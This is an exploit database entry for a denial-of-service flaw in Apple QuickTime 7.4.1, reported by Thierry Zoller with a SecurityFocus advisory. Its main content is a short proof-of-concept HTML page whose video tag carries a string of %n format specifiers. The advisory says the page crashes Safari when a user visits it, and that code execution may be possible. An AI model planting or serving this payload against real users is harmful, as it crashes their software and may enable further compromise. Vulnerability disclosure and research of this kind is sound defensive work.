Apple QuickTime 7.4.1 - Null Pointer Dereference Denial of Service

2009-05-14T00:00:00
ID EXPLOITPACK:F7FD9E8FFCA79F621CB3EC7D2C49DC46
Type exploitpack
Reporter Thierry Zoller
Modified 2009-05-14T00:00:00

Description

Apple QuickTime 7.4.1 - Null Pointer Dereference Denial of Service

                                        
                                            source: https://www.securityfocus.com/bid/35359/info

Apple QuickTime is prone to a denial-of-service vulnerability.

Note that an attacker will exploit this issue through the Safari browser by enticing a user to visit a malicious site. This will crash the user's browser.

Successful exploits may allow the attacker to crash the affected application, denying service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed. 

<html>
<video src=%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n>Video</video>
</html>